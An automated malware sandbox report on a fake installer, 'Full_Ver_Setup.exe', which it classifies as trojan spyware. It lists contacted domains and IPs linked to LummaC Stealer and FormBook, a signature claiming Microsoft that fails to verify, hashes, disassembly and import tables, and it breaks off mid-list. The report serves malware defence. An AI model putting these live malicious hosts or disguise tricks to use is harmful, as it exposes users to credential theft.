https://support.microsof | Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fannleadyn.click/ | Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.remobjects.com/ps | Full_Ver_Setup.exe | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.84.113 | kliptizq.shop | United States | | 13335 | CLOUDFLARENETUS | false
104.21.63.229 | fannleadyn.click | United States | | 13335 | CLOUDFLARENETUS | true
194.58.112.174 | neqi.shop | Russian Federation | | 197695 | AS-REGRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579540
Start date and time: 2024-12-22 23:29:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Full_Ver_Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/3@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 109
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3064 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:30:19 | API Interceptor | 11x Sleep call for process: Full_Ver_Setup.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 104.21.84.113
• TT4ybwWc1T.exe | malicious | LummaC Stealer, zgRAT | voloknus.pw/api
Match: 104.21.63.229
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
• 'Setup.exe | malicious | LummaC Stealer
• http://cabonusoffer.com/track/ | malicious | Unknown
Match: 194.58.112.174
• SWIFT COPY.exe | malicious | FormBook | www.elinor.club/1ne4/
• Nieuwebestellingen10122024.exe | malicious | FormBook | www.synd.fun/6sgf/
• SRT68.exe | malicious | FormBook | www.fantastica.digital/5srj/
• 72STaC6BmljfbIQ.exe | malicious | FormBook | www.elinor.club/1ne4/
• specification and drawing.exe | malicious | FormBook, PureLog Stealer | www.synd.fun/6sgf/
• Pre Alert PO TVKJEANSA00967.bat.exe | malicious | FormBook, PureLog Stealer | www.elinor.club/7plr/
• CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.sklad-iq.online/gdvz/
• CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.sklad-iq.online/gdvz/
• Item-RQF-9456786.exe | malicious | Unknown | www.sklad-iq.online/j4lg/
• PO AT-5228.exe | malicious | FormBook | www.marketplacer.top/xprp/
Associated Sample Name / URL | Detection | Threat Name | Context
Match: kliptizq.shop
• setup.exe | malicious | LummaC | 104.21.84.113
• Setup.exe | malicious | LummaC | 104.21.84.113
• setup.exe | malicious | LummaC | 172.67.191.144
• Set-up.exe | malicious | LummaC Stealer | 104.21.84.113
• 'Setup.exe | malicious | LummaC Stealer | 172.67.191.144
Associated Sample Name / URL | Detection | Threat Name | Context
Match: CLOUDFLARENETUS
• loligang.sh4.elf | malicious | Mirai | 162.158.254.178
• winwidgetshp.mp4.hta | malicious | LummaC | 104.21.18.182
• https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/ | malicious | HTMLPhisher | 104.21.234.144
• nshkppc.elf | malicious | Mirai | 104.24.135.181
• swift-bootstrapper.exe | malicious | Unknown | 104.18.38.10
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.67.146
• 7394231845.html | malicious | Unknown | 104.17.25.14
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.67.146
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.63.229
Match: AS-REGRU
• SWIFT COPY.exe | malicious | FormBook | 194.58.112.174
• arm.nn.elf | malicious | Mirai, Okiru | 194.58.59.91
• Nieuwebestellingen10122024.exe | malicious | FormBook | 194.58.112.174
• hax.ppc.elf | malicious | Mirai | 194.58.94.235
• Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | malicious | FormBook | 31.31.198.145
• Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 194.87.189.43
• Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 194.87.189.43
• cXjy5Y6dXX.exe | malicious | RHADAMANTHYS | 193.124.205.63
• SRT68.exe | malicious | FormBook | 194.58.112.174
• New Order.exe | malicious | FormBook | 31.31.196.17
Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
• winwidgetshp.mp4.hta | malicious | LummaC | 104.21.84.113, 104.21.63.229
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.84.113, 104.21.63.229
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.84.113, 104.21.63.229
• Solara-3.0.exe | malicious | LummaC | 104.21.84.113, 104.21.63.229
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 104.21.84.113, 104.21.63.229
• Rechnung736258.pdf.lnk | malicious | LummaC | 104.21.84.113, 104.21.63.229
• Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 104.21.84.113, 104.21.63.229
No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.6599547231656377
Encrypted: false
SSDEEP: 3:Nllluly/:NllU
MD5: CD58C7193AF7B74B8F5AB012CEAA83D1
SHA1: 48F5F741531E2611CC155853BB9BFCF470AD2262
SHA-256: AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
SHA-512: B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e...........................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):0.4156493702622237
TrID:
• Win32 Executable (generic) a (10002005/4) 97.75%
• Windows ActiveX control (116523/4) 1.14%
• Inno Setup installer (109748/4) 1.07%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name:Full_Ver_Setup.exe
File size:74'953'137 bytes
MD5:5258ca149eea36d761a7e5649cb93855
SHA1:6b6c7a347389758d8edfb8582a730871c6786c06
SHA256:d92ea1ef0c0f2c1b6fe016fc25473bb6ce625d9a2c5134c62806aeb07c5033af
SHA512:2b8f9f29476c7f7020a5d0fcb61bf2f58e65bf35e4b2feb904c2b93cf935a8c4a1909c42a16ef2b70f5338996513c9349e816141de96051675527d415ffe7cf8
SSDEEP:24576:jtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFJ5CnBTx93rhK2whYYY4:RqTytRFk6ekpCnH9h/Yn
TLSH:C1F7294B5353AAB38B19056206BDEEDC17B23A0407F7C0D7B958758A3CA75CA36BD903
File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:6187133b3b1f8671
Entrypoint:0x50156c
Entrypoint Section:.itext
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:f62b90e31eca404f228fcf7068b00f31
Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• Not Before: 15/12/2020 21:24:20, Not After: 02/12/2021 21:24:20
Subject Chain
• CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:33000003DFFB6AE3F427ECB6A30000000003DF
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 004FEBF4h
call 00007FBDE86023E2h
push FFFFFFECh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007FBDE860328Dh
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00504E38h]
push ebx
call 00007FBDE86034E2h
xor eax, eax
push ebp
push 005015E7h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FBDE8602C2Dh
call 00007FBDE86F7D8Ch
mov eax, dword ptr [004FE82Ch]
push eax
push 004FE890h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
call 00007FBDE8675821h
call 00007FBDE86F7DE0h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FBDE86FAA2Bh
jmp 00007FBDE85FDB09h
call 00007FBDE86F7B5Ch
mov eax, 00000001h
call 00007FBDE85FE5CAh
call 00007FBDE85FDF4Dh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, 0050177Ch
call 00007FBDE867532Ch
push 00000005h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007FBDE86034A3h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004D9740h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10d000 | 0x3840 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x113000 | 0x87a00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4778fe1 | 0x21d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x112000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10da80 | 0x88c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfe084 | 0xfe200 | e4dc63033da7e84c78cb02b3453c260a | False | 0.4818685055951795 | data | 6.4800534551578055 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x100000 | 0x1788 | 0x1800 | 030d751d7e20e11f863bdb27a950c708 | False | 0.5203450520833334 | data | 5.94899155660316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x102000 | 0x3068 | 0x3200 | 2f90c6f68c18651f5b580d5ad2b852e9 | False | 0.421796875 | data | 4.334644118113417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x106000 | 0x6194 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10d000 | 0x3840 | 0x3a00 | e31e730fc86b9dac8932bd3f92752751 | False | 0.31041217672413796 | data | 5.202469592139362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x111000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x112000 | 0x18 | 0x200 | d6264f4705ad03600aa29f24c89eb799 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x113000 | 0x87a00 | 0x87a00 | 1c448c1f995d48f7fbeb430dbdc5cb56 | False | 0.4662928427419355 | data | 7.203198304573814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x113ca4 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x113dd8 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x113f0c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x114040 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x114174 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x1142a8 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x1143dc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x114510 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
RT_BITMAP | 0x1149f8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
RT_ICON | 0x114ae0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 8504 x 8504 px/m | English | United States | 0.1044451673961907
RT_ICON | 0x125308 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 8504 x 8504 px/m | English | United States | 0.12528904771915073
RT_ICON | 0x12e7b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 8504 x 8504 px/m | English | United States | 0.17442135096835143
RT_ICON | 0x1329d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 8504 x 8504 px/m | English | United States | 0.2287344398340249
RT_ICON | 0x134f80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 8504 x 8504 px/m | English | United States | 0.3271575984990619
RT_ICON | 0x136028 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 8504 x 8504 px/m | English | United States | 0.5824468085106383
RT_STRING | 0x136490 | 0xec | data | | | 0.6059322033898306
RT_STRING | 0x13657c | 0x250 | data | | | 0.47466216216216217
RT_STRING | 0x1367cc | 0x28c | data | | | 0.4647239263803681
RT_STRING | 0x136a58 | 0x3e4 | data | | | 0.4347389558232932
RT_STRING | 0x136e3c | 0x9c | data | | | 0.717948717948718
RT_STRING | 0x136ed8 | 0xe8 | data | | | 0.6293103448275862
RT_STRING | 0x136fc0 | 0x468 | data | | | 0.3820921985815603
RT_STRING | 0x137428 | 0x38c | data | | | 0.3898678414096916
RT_STRING | 0x1377b4 | 0x3dc | data | | | 0.39271255060728744
RT_STRING | 0x137b90 | 0x360 | data | | | 0.37037037037037035
RT_STRING | 0x137ef0 | 0x40c | data | | | 0.3783783783783784
RT_STRING | 0x1382fc | 0x108 | data | | | 0.5113636363636364
                                                                                                                                                                RT_STRING0x1384040xccdata0.6029411764705882
                                                                                                                                                                RT_STRING0x1384d00x234data0.5070921985815603
                                                                                                                                                                RT_STRING0x1387040x3c8data0.3181818181818182
                                                                                                                                                                RT_STRING0x138acc0x32cdata0.43349753694581283
                                                                                                                                                                RT_STRING0x138df80x2a0data0.41964285714285715
                                                                                                                                                                RT_RCDATA0x1390980x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                                RT_RCDATA0x1413800x10data1.5
                                                                                                                                                                RT_RCDATA0x1413900x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                RT_RCDATA0x142b900x6b0data0.6466121495327103
                                                                                                                                                                RT_RCDATA0x1432400x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                                RT_RCDATA0x148d500x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                                RT_RCDATA0x148e780x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                                RT_RCDATA0x14921c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                                RT_RCDATA0x14953c0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                                RT_RCDATA0x14983c0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                                RT_RCDATA0x149e180x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                RT_RCDATA0x14a27c0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                RT_GROUP_CURSOR0x14c3100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                RT_GROUP_CURSOR0x14c3240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                RT_GROUP_CURSOR0x14c3380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c34c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_ICON0x14c39c0x5adataEnglishUnited States0.7777777777777778
                                                                                                                                                                RT_VERSION0x14c3f80x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                RT_MANIFEST0x14c5540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, 